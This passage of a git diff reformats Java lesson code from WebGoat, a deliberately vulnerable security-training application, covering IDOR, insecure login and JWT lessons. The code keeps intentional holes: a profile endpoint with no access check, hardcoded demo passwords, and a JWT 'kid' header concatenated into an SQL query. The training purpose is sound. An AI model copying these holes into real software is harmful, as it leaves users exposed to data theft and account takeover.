+      currentUserProfile.setRole(userSubmittedProfile.getRole());
+      // we will persist in the session object for now in case we want to refer back or use it later
+      userSessionData.setValue("idor-updated-other-profile", currentUserProfile);
+      if (currentUserProfile.getRole() <= 1
+          && currentUserProfile.getColor().toLowerCase().equals("red")) {
+        return success(this)
+            .feedback("idor.edit.profile.success1")
+            .output(currentUserProfile.profileToMap().toString())
+            .build();
+      }
 
-            if (currentUserProfile.getRole() > 1 && currentUserProfile.getColor().toLowerCase().equals("red")) {
-                return success(this)
-                        .feedback("idor.edit.profile.failure1")
-                        .output(currentUserProfile.profileToMap().toString())
-                        .build();
-            }
+      if (currentUserProfile.getRole() > 1
+          && currentUserProfile.getColor().toLowerCase().equals("red")) {
+        return success(this)
+            .feedback("idor.edit.profile.failure1")
+            .output(currentUserProfile.profileToMap().toString())
+            .build();
+      }
 
-            if (currentUserProfile.getRole() <= 1 && !currentUserProfile.getColor().toLowerCase().equals("red")) {
-                return success(this)
-                        .feedback("idor.edit.profile.failure2")
-                        .output(currentUserProfile.profileToMap().toString())
-                        .build();
-            }
-
-            // else
-            return failed(this)
-                    .feedback("idor.edit.profile.failure3")
-                    .output(currentUserProfile.profileToMap().toString())
-                    .build();
-        } else if (userSubmittedProfile.getUserId().equals(authUserId)) {
-            return failed(this).feedback("idor.edit.profile.failure4").build();
-        }
-
-        if (currentUserProfile.getColor().equals("black") && currentUserProfile.getRole() <= 1) {
-            return success(this)
-                    .feedback("idor.edit.profile.success2")
-                    .output(userSessionData.getValue("idor-updated-own-profile").toString())
-                    .build();
-        } else {
-            return failed(this).feedback("idor.edit.profile.failure3").build();
-        }
+      if (currentUserProfile.getRole() <= 1
+          && !currentUserProfile.getColor().toLowerCase().equals("red")) {
+        return success(this)
+            .feedback("idor.edit.profile.failure2")
+            .output(currentUserProfile.profileToMap().toString())
+            .build();
+      }
 
+      // else
+      return failed(this)
+          .feedback("idor.edit.profile.failure3")
+          .output(currentUserProfile.profileToMap().toString())
+          .build();
+    } else if (userSubmittedProfile.getUserId().equals(authUserId)) {
+      return failed(this).feedback("idor.edit.profile.failure4").build();
     }
 
+    if (currentUserProfile.getColor().equals("black") && currentUserProfile.getRole() <= 1) {
+      return success(this)
+          .feedback("idor.edit.profile.success2")
+          .output(userSessionData.getValue("idor-updated-own-profile").toString())
+          .build();
+    } else {
+      return failed(this).feedback("idor.edit.profile.failure3").build();
+    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/IDORLogin.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORLogin.java
index 89e3b139d..1b656c0cf 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/IDORLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORLogin.java
@@ -22,6 +22,8 @@
 
 package org.owasp.webgoat.lessons.idor;
 
+import java.util.HashMap;
+import java.util.Map;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -31,47 +33,44 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.HashMap;
-import java.util.Map;
-
 @RestController
 @AssignmentHints({"idor.hints.idor_login"})
 public class IDORLogin extends AssignmentEndpoint {
 
-    private Map<String, Map<String, String>> idorUserInfo = new HashMap<>();
+  private Map<String, Map<String, String>> idorUserInfo = new HashMap<>();
 
-    public void initIDORInfo() {
+  public void initIDORInfo() {
 
-        idorUserInfo.put("tom", new HashMap<String, String>());
-        idorUserInfo.get("tom").put("password", "cat");
-        idorUserInfo.get("tom").put("id", "2342384");
-        idorUserInfo.get("tom").put("color", "yellow");
-        idorUserInfo.get("tom").put("size", "small");
+    idorUserInfo.put("tom", new HashMap<String, String>());
+    idorUserInfo.get("tom").put("password", "cat");
+    idorUserInfo.get("tom").put("id", "2342384");
+    idorUserInfo.get("tom").put("color", "yellow");
+    idorUserInfo.get("tom").put("size", "small");
 
-        idorUserInfo.put("bill", new HashMap<String, String>());
-        idorUserInfo.get("bill").put("password", "buffalo");
-        idorUserInfo.get("bill").put("id", "2342388");
-        idorUserInfo.get("bill").put("color", "brown");
-        idorUserInfo.get("bill").put("size", "large");
+    idorUserInfo.put("bill", new HashMap<String, String>());
+    idorUserInfo.get("bill").put("password", "buffalo");
+    idorUserInfo.get("bill").put("id", "2342388");
+    idorUserInfo.get("bill").put("color", "brown");
+    idorUserInfo.get("bill").put("size", "large");
+  }
 
+  @PostMapping("/IDOR/login")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String username, @RequestParam String password) {
+    initIDORInfo();
+    UserSessionData userSessionData = getUserSessionData();
+
+    if (idorUserInfo.containsKey(username)) {
+      if ("tom".equals(username) && idorUserInfo.get("tom").get("password").equals(password)) {
+        userSessionData.setValue("idor-authenticated-as", username);
+        userSessionData.setValue(
+            "idor-authenticated-user-id", idorUserInfo.get(username).get("id"));
+        return success(this).feedback("idor.login.success").feedbackArgs(username).build();
+      } else {
+        return failed(this).feedback("idor.login.failure").build();
+      }
+    } else {
+      return failed(this).feedback("idor.login.failure").build();
     }
-
-    @PostMapping("/IDOR/login")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String username, @RequestParam String password) {
-        initIDORInfo();
-        UserSessionData userSessionData = getUserSessionData();
-
-        if (idorUserInfo.containsKey(username)) {
-            if ("tom".equals(username) && idorUserInfo.get("tom").get("password").equals(password)) {
-                userSessionData.setValue("idor-authenticated-as", username);
-                userSessionData.setValue("idor-authenticated-user-id", idorUserInfo.get(username).get("id"));
-                return success(this).feedback("idor.login.success").feedbackArgs(username).build();
-            } else {
-                return failed(this).feedback("idor.login.failure").build();
-            }
-        } else {
-            return failed(this).feedback("idor.login.failure").build();
-        }
-    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOtherProfile.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOtherProfile.java
index 1710655fd..f216cb580 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOtherProfile.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOtherProfile.java
@@ -22,6 +22,9 @@
 
 package org.owasp.webgoat.lessons.idor;
 
+import java.util.HashMap;
+import java.util.Map;
+import javax.servlet.http.HttpServletResponse;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -32,38 +35,49 @@ import org.springframework.web.bind.annotation.PathVariable;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletResponse;
-import java.util.HashMap;
-import java.util.Map;
-
 @RestController
-@AssignmentHints({"idor.hints.otherProfile1", "idor.hints.otherProfile2", "idor.hints.otherProfile3", "idor.hints.otherProfile4", "idor.hints.otherProfile5", "idor.hints.otherProfile6", "idor.hints.otherProfile7", "idor.hints.otherProfile8", "idor.hints.otherProfile9"})
+@AssignmentHints({
+  "idor.hints.otherProfile1",
+  "idor.hints.otherProfile2",
+  "idor.hints.otherProfile3",
+  "idor.hints.otherProfile4",
+  "idor.hints.otherProfile5",
+  "idor.hints.otherProfile6",
+  "idor.hints.otherProfile7",
+  "idor.hints.otherProfile8",
+  "idor.hints.otherProfile9"
+})
 public class IDORViewOtherProfile extends AssignmentEndpoint {
 
-    @Autowired
-    UserSessionData userSessionData;
+  @Autowired UserSessionData userSessionData;
 
-    @GetMapping(path = "/IDOR/profile/{userId}", produces = {"application/json"})
-    @ResponseBody
-    public AttackResult completed(@PathVariable("userId") String userId, HttpServletResponse resp) {
-        Map<String, Object> details = new HashMap<>();
+  @GetMapping(
+      path = "/IDOR/profile/{userId}",
+      produces = {"application/json"})
+  @ResponseBody
+  public AttackResult completed(@PathVariable("userId") String userId, HttpServletResponse resp) {
+    Map<String, Object> details = new HashMap<>();
 
-        if (userSessionData.getValue("idor-authenticated-as").equals("tom")) {
-            //going to use session auth to view this one
-            String authUserId = (String) userSessionData.getValue("idor-authenticated-user-id");
-            if (userId != null && !userId.equals(authUserId)) {
-                //on the right track
-                UserProfile requestedProfile = new UserProfile(userId);
-                // secure code would ensure there was a horizontal access control check prior to dishing up the requested profile
-                if (requestedProfile.getUserId().equals("2342388")) {
-                    return success(this).feedback("idor.view.profile.success").output(requestedProfile.profileToMap().toString()).build();
-                } else {
-                    return failed(this).feedback("idor.view.profile.close1").build();
-                }
-            } else {
-                return failed(this).feedback("idor.view.profile.close2").build();
-            }
+    if (userSessionData.getValue("idor-authenticated-as").equals("tom")) {
+      // going to use session auth to view this one
+      String authUserId = (String) userSessionData.getValue("idor-authenticated-user-id");
+      if (userId != null && !userId.equals(authUserId)) {
+        // on the right track
+        UserProfile requestedProfile = new UserProfile(userId);
+        // secure code would ensure there was a horizontal access control check prior to dishing up
+        // the requested profile
+        if (requestedProfile.getUserId().equals("2342388")) {
+          return success(this)
+              .feedback("idor.view.profile.success")
+              .output(requestedProfile.profileToMap().toString())
+              .build();
+        } else {
+          return failed(this).feedback("idor.view.profile.close1").build();
         }
-        return failed(this).build();
+      } else {
+        return failed(this).feedback("idor.view.profile.close2").build();
+      }
     }
+    return failed(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfile.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfile.java
index c4a4f0e9d..ec78df0bd 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfile.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfile.java
@@ -22,7 +22,8 @@
 
 package org.owasp.webgoat.lessons.idor;
 
-
+import java.util.HashMap;
+import java.util.Map;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
@@ -30,36 +31,36 @@ import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.HashMap;
-import java.util.Map;
-
 @RestController
 @Slf4j
 public class IDORViewOwnProfile {
 
-    @Autowired
-    UserSessionData userSessionData;
+  @Autowired UserSessionData userSessionData;
 
-    @GetMapping(path = {"/IDOR/own", "/IDOR/profile"}, produces = {"application/json"})
-    @ResponseBody
-    public Map<String, Object> invoke() {
-        Map<String,Object> details = new HashMap<>();
-        try {
-            if (userSessionData.getValue("idor-authenticated-as").equals("tom")) {
-                //going to use session auth to view this one
-                String authUserId = (String)userSessionData.getValue("idor-authenticated-user-id");
-                UserProfile userProfile = new UserProfile(authUserId);
-                details.put("userId",userProfile.getUserId());
-                details.put("name",userProfile.getName());
-                details.put("color",userProfile.getColor());
-                details.put("size",userProfile.getSize());
-                details.put("role",userProfile.getRole());
-            } else {
-                details.put("error","You do not have privileges to view the profile. Authenticate as tom first please.");
-            }
-        }catch (Exception ex) {
-            log.error("something went wrong", ex.getMessage());
-        }
-        return details;
+  @GetMapping(
+      path = {"/IDOR/own", "/IDOR/profile"},
+      produces = {"application/json"})
+  @ResponseBody
+  public Map<String, Object> invoke() {
+    Map<String, Object> details = new HashMap<>();
+    try {
+      if (userSessionData.getValue("idor-authenticated-as").equals("tom")) {
+        // going to use session auth to view this one
+        String authUserId = (String) userSessionData.getValue("idor-authenticated-user-id");
+        UserProfile userProfile = new UserProfile(authUserId);
+        details.put("userId", userProfile.getUserId());
+        details.put("name", userProfile.getName());
+        details.put("color", userProfile.getColor());
+        details.put("size", userProfile.getSize());
+        details.put("role", userProfile.getRole());
+      } else {
+        details.put(
+            "error",
+            "You do not have privileges to view the profile. Authenticate as tom first please.");
+      }
+    } catch (Exception ex) {
+      log.error("something went wrong", ex.getMessage());
     }
+    return details;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfileAltUrl.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfileAltUrl.java
index 38a8ba5f0..a2fe4cb9c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfileAltUrl.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfileAltUrl.java
@@ -22,7 +22,6 @@
 
 package org.owasp.webgoat.lessons.idor;
 
-
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -34,33 +33,42 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
-@AssignmentHints({"idor.hints.ownProfileAltUrl1", "idor.hints.ownProfileAltUrl2", "idor.hints.ownProfileAltUrl3"})
+@AssignmentHints({
+  "idor.hints.ownProfileAltUrl1",
+  "idor.hints.ownProfileAltUrl2",
+  "idor.hints.ownProfileAltUrl3"
+})
 public class IDORViewOwnProfileAltUrl extends AssignmentEndpoint {
 
-    @Autowired
-    UserSessionData userSessionData;
+  @Autowired UserSessionData userSessionData;
 
-    @PostMapping("/IDOR/profile/alt-path")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String url) {
-        try {
-            if (userSessionData.getValue("idor-authenticated-as").equals("tom")) {
-                //going to use session auth to view this one
-                String authUserId = (String) userSessionData.getValue("idor-authenticated-user-id");
-                //don't care about http://localhost:8080 ... just want WebGoat/
-                String[] urlParts = url.split("/");
-                if (urlParts[0].equals("WebGoat") && urlParts[1].equals("IDOR") && urlParts[2].equals("profile") && urlParts[3].equals(authUserId)) {
-                    UserProfile userProfile = new UserProfile(authUserId);
-                    return success(this).feedback("idor.view.own.profile.success").output(userProfile.profileToMap().toString()).build();
-                } else {
-                    return failed(this).feedback("idor.view.own.profile.failure1").build();
-                }
-
-            } else {
-                return failed(this).feedback("idor.view.own.profile.failure2").build();
-            }
-        } catch (Exception ex) {
-            return failed(this).feedback("an error occurred with your request").build();
+  @PostMapping("/IDOR/profile/alt-path")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String url) {
+    try {
+      if (userSessionData.getValue("idor-authenticated-as").equals("tom")) {
+        // going to use session auth to view this one
+        String authUserId = (String) userSessionData.getValue("idor-authenticated-user-id");
+        // don't care about http://localhost:8080 ... just want WebGoat/
+        String[] urlParts = url.split("/");
+        if (urlParts[0].equals("WebGoat")
+            && urlParts[1].equals("IDOR")
+            && urlParts[2].equals("profile")
+            && urlParts[3].equals(authUserId)) {
+          UserProfile userProfile = new UserProfile(authUserId);
+          return success(this)
+              .feedback("idor.view.own.profile.success")
+              .output(userProfile.profileToMap().toString())
+              .build();
+        } else {
+          return failed(this).feedback("idor.view.own.profile.failure1").build();
         }
+
+      } else {
+        return failed(this).feedback("idor.view.own.profile.failure2").build();
+      }
+    } catch (Exception ex) {
+      return failed(this).feedback("an error occurred with your request").build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/UserProfile.java b/src/main/java/org/owasp/webgoat/lessons/idor/UserProfile.java
index 569119fcf..f1490b2a5 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/UserProfile.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/UserProfile.java
@@ -25,112 +25,117 @@ package org.owasp.webgoat.lessons.idor;
 import java.util.HashMap;
 import java.util.Map;
 
-/**
- * Created by jason on 1/5/17.
- */
+/** Created by jason on 1/5/17. */
 public class UserProfile {
-    private String userId;
-    private String name;
-    private String color;
-    private String size;
-    private boolean isAdmin;
-    private int role;
+  private String userId;
+  private String name;
+  private String color;
+  private String size;
+  private boolean isAdmin;
+  private int role;
 
-    public UserProfile() {}
+  public UserProfile() {}
 
-    public UserProfile(String id) {
-        setProfileFromId(id);
+  public UserProfile(String id) {
+    setProfileFromId(id);
+  }
+
+  //
+  private void setProfileFromId(String id) {
+    // emulate look up from database
+    if (id.equals("2342384")) {
+      this.userId = id;
+      this.color = "yellow";
+      this.name = "Tom Cat";
+      this.size = "small";
+      this.isAdmin = false;
+      this.role = 3;
+    } else if (id.equals("2342388")) {
+      this.userId = id;
+      this.color = "brown";
+      this.name = "Buffalo Bill";
+      this.size = "large";
+      this.isAdmin = false;
+      this.role = 3;
+    } else {
+      // not found
     }
+  }
 
-    //
-    private void setProfileFromId(String id) {
-        // emulate look up from database
-        if (id.equals("2342384")) {
-            this.userId = id;
-            this.color = "yellow";
-            this.name = "Tom Cat";
-            this.size = "small";
-            this.isAdmin = false;
-            this.role = 3;
-        } else if (id.equals("2342388")) {
-            this.userId = id;
-            this.color = "brown";
-            this.name = "Buffalo Bill";
-            this.size = "large";
-            this.isAdmin = false;
-            this.role = 3;
-        } else {
-            //not found
-        }
+  public Map<String, Object> profileToMap() {
+    Map<String, Object> profileMap = new HashMap<>();
+    profileMap.put("userId", this.userId);
+    profileMap.put("name", this.name);
+    profileMap.put("color", this.color);
+    profileMap.put("size", this.size);
+    profileMap.put("role", this.role);
+    return profileMap;
+  }
 
-    }
+  public String toHTMLString() {
+    String htmlBreak = "<br/>";
+    return "userId"
+        + this.userId
+        + htmlBreak
+        + "name"
+        + this.name
+        + htmlBreak
+        + "size"
+        + this.size
+        + htmlBreak
+        + "role"
+        + this.role
+        + htmlBreak
+        + "isAdmin"
+        + this.isAdmin;
+  }
 
-    public Map <String,Object> profileToMap () {
-        Map<String,Object> profileMap = new HashMap<>();
-        profileMap.put("userId", this.userId);
-        profileMap.put("name", this.name);
-        profileMap.put("color", this.color);
-        profileMap.put("size", this.size);
-        profileMap.put("role", this.role);
-        return profileMap;
-    }
+  //
+  public String getUserId() {
+    return userId;
+  }
 
-    public String toHTMLString() {
-        String htmlBreak = "<br/>";
-        return "userId" + this.userId + htmlBreak +
-                "name" + this.name + htmlBreak +
-                "size" + this.size + htmlBreak +
-                "role" + this.role + htmlBreak +
-                "isAdmin" + this.isAdmin;
-    }
+  public void setUserId(String userId) {
+    this.userId = userId;
+  }
 
-    //
-    public String getUserId() {
-        return userId;
-    }
+  public String getName() {
+    return name;
+  }
 
-    public void setUserId(String userId) {
-        this.userId = userId;
-    }
+  public void setName(String name) {
+    this.name = name;
+  }
 
-    public String getName() {
-        return name;
-    }
+  public String getColor() {
+    return color;
+  }
 
-    public void setName(String name) {
-        this.name = name;
-    }
+  public void setColor(String color) {
+    this.color = color;
+  }
 
-    public String getColor() {
-        return color;
-    }
+  public String getSize() {
+    return size;
+  }
 
-    public void setColor(String color) {
-        this.color = color;
-    }
+  public void setSize(String size) {
+    this.size = size;
+  }
 
-    public String getSize() {
-        return size;
-    }
+  public boolean isAdmin() {
+    return isAdmin;
+  }
 
-    public void setSize(String size) {
-        this.size = size;
-    }
+  public void setAdmin(boolean admin) {
+    isAdmin = admin;
+  }
 
-    public boolean isAdmin() {
-        return isAdmin;
-    }
-
-    public void setAdmin(boolean admin) {
-        isAdmin = admin;
-    }
-
-    public int getRole() {
-        return role;
-    }
-
-    public void setRole(int role) {
-        this.role = role;
-    }
+  public int getRole() {
+    return role;
+  }
 
+  public void setRole(int role) {
+    this.role = role;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLogin.java b/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLogin.java
index dc04e2969..d017421e2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLogin.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -35,13 +36,13 @@ import org.springframework.stereotype.Component;
  */
 @Component
 public class InsecureLogin extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A7;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A7;
+  }
 
-    @Override
-    public String getTitle() {
-        return "insecure-login.title";
-    }
+  @Override
+  public String getTitle() {
+    return "insecure-login.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLoginTask.java b/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLoginTask.java
index 72faf5a6f..8d39a594d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLoginTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLoginTask.java
@@ -30,18 +30,18 @@ import org.springframework.web.bind.annotation.*;
 @RestController
 public class InsecureLoginTask extends AssignmentEndpoint {
 
-    @PostMapping("/InsecureLogin/task")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String username, @RequestParam String password) {
-    	if ("CaptainJack".equals(username) && "BlackPearl".equals(password)) {
-    		return success(this).build();
-    	}
-        return failed(this).build();
+  @PostMapping("/InsecureLogin/task")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String username, @RequestParam String password) {
+    if ("CaptainJack".equals(username) && "BlackPearl".equals(password)) {
+      return success(this).build();
     }
+    return failed(this).build();
+  }
 
-    @PostMapping("/InsecureLogin/login")
-    @ResponseStatus(HttpStatus.ACCEPTED)
-    public void login() {
-        //only need to exists as the JS needs to call an existing endpoint
-    }
+  @PostMapping("/InsecureLogin/login")
+  @ResponseStatus(HttpStatus.ACCEPTED)
+  public void login() {
+    // only need to exists as the JS needs to call an existing endpoint
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
index d65b566c1..31dee5ef5 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
@@ -33,13 +33,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class JWT extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A7;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A7;
+  }
 
-    @Override
-    public String getTitle() {
-        return "jwt.title";
-    }
+  @Override
+  public String getTitle() {
+    return "jwt.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpoint.java
index 0d2f06c6f..9b27236cb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpoint.java
@@ -10,13 +10,13 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 public class JWTDecodeEndpoint extends AssignmentEndpoint {
 
-    @PostMapping("/JWT/decode")
-    @ResponseBody
-    public AttackResult decode(@RequestParam("jwt-encode-user") String user) {
-        if ("user".equals(user)) {
-            return success(this).build();
-        } else {
-            return failed(this).build();
-        }
+  @PostMapping("/JWT/decode")
+  @ResponseBody
+  public AttackResult decode(@RequestParam("jwt-encode-user") String user) {
+    if ("user".equals(user)) {
+      return success(this).build();
+    } else {
+      return failed(this).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpoint.java
index 67d2a87b9..e84bbf809 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpoint.java
@@ -24,6 +24,8 @@ package org.owasp.webgoat.lessons.jwt;
 
 import io.jsonwebtoken.*;
 import io.jsonwebtoken.impl.TextCodec;
+import java.sql.ResultSet;
+import java.sql.SQLException;
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -31,10 +33,9 @@ import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.*;
 
-import java.sql.ResultSet;
-import java.sql.SQLException;
-
 /**
+ *
+ *
  * <pre>
  *  {
  *      "typ": "JWT",
@@ -59,64 +60,77 @@ import java.sql.SQLException;
  * @since 4/23/17.
  */
 @RestController
-@AssignmentHints({"jwt-final-hint1", "jwt-final-hint2", "jwt-final-hint3", "jwt-final-hint4", "jwt-final-hint5", "jwt-final-hint6"})
+@AssignmentHints({
+  "jwt-final-hint1",
+  "jwt-final-hint2",
+  "jwt-final-hint3",
+  "jwt-final-hint4",
+  "jwt-final-hint5",
+  "jwt-final-hint6"
+})
 public class JWTFinalEndpoint extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    private JWTFinalEndpoint(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
-    
-    @PostMapping("/JWT/final/follow/{user}")
-    public @ResponseBody
-    String follow(@PathVariable("user") String user) {
-        if ("Jerry".equals(user)) {
-            return "Following yourself seems redundant";
-        } else {
-            return "You are now following Tom";
-        }
-    }
+  private JWTFinalEndpoint(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/JWT/final/delete")
-    public @ResponseBody
-    AttackResult resetVotes(@RequestParam("token") String token) {
-        if (StringUtils.isEmpty(token)) {
-            return failed(this).feedback("jwt-invalid-token").build();
-        } else {
-            try {
-                final String[] errorMessage = {null};
-                Jwt jwt = Jwts.parser().setSigningKeyResolver(new SigningKeyResolverAdapter() {
-                    @Override
-                    public byte[] resolveSigningKeyBytes(JwsHeader header, Claims claims) {
+  @PostMapping("/JWT/final/follow/{user}")
+  public @ResponseBody String follow(@PathVariable("user") String user) {
+    if ("Jerry".equals(user)) {
+      return "Following yourself seems redundant";
+    } else {
+      return "You are now following Tom";
+    }
+  }
+
+  @PostMapping("/JWT/final/delete")
+  public @ResponseBody AttackResult resetVotes(@RequestParam("token") String token) {
+    if (StringUtils.isEmpty(token)) {
+      return failed(this).feedback("jwt-invalid-token").build();
+    } else {
+      try {
+        final String[] errorMessage = {null};
+        Jwt jwt =
+            Jwts.parser()
+                .setSigningKeyResolver(
+                    new SigningKeyResolverAdapter() {
+                      @Override
+                      public byte[] resolveSigningKeyBytes(JwsHeader header, Claims claims) {
                         final String kid = (String) header.get("kid");
                         try (var connection = dataSource.getConnection()) {
-                            ResultSet rs = connection.createStatement().executeQuery("SELECT key FROM jwt_keys WHERE id = '" + kid + "'");
-                            while (rs.next()) {
-                                return TextCodec.BASE64.decode(rs.getString(1));
-                            }
+                          ResultSet rs =
+                              connection
+                                  .createStatement()
+                                  .executeQuery(
+                                      "SELECT key FROM jwt_keys WHERE id = '" + kid + "'");
+                          while (rs.next()) {
+                            return TextCodec.BASE64.decode(rs.getString(1));
+                          }
                         } catch (SQLException e) {
-                            errorMessage[0] = e.getMessage();
+                          errorMessage[0] = e.getMessage();
                         }
                         return null;
-                    }
-                }).parseClaimsJws(token);
-                if (errorMessage[0] != null) {
-                    return failed(this).output(errorMessage[0]).build();
-                }
-                Claims claims = (Claims) jwt.getBody();
-                String username = (String) claims.get("username");
-                if ("Jerry".equals(username)) {
-                    return failed(this).feedback("jwt-final-jerry-account").build();
-                }
-                if ("Tom".equals(username)) {
-                    return success(this).build();
-                } else {
-                    return failed(this).feedback("jwt-final-not-tom").build();
-                }
-            } catch (JwtException e) {
-                return failed(this).feedback("jwt-invalid-token").output(e.toString()).build();
-            }
+                      }
+                    })
+                .parseClaimsJws(token);
+        if (errorMessage[0] != null) {
+          return failed(this).output(errorMessage[0]).build();
         }
+        Claims claims = (Claims) jwt.getBody();
+        String username = (String) claims.get("username");
+        if ("Jerry".equals(username)) {
+          return failed(this).feedback("jwt-final-jerry-account").build();
+        }
+        if ("Tom".equals(username)) {
+          return success(this).build();
+        } else {
+          return failed(this).feedback("jwt-final-not-tom").build();
+        }
+      } catch (JwtException e) {
+        return failed(this).feedback("jwt-invalid-token").output(e.toString()).build();
+      }
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTQuiz.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTQuiz.java
index 26f544cd4..abcd08edd 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTQuiz.java
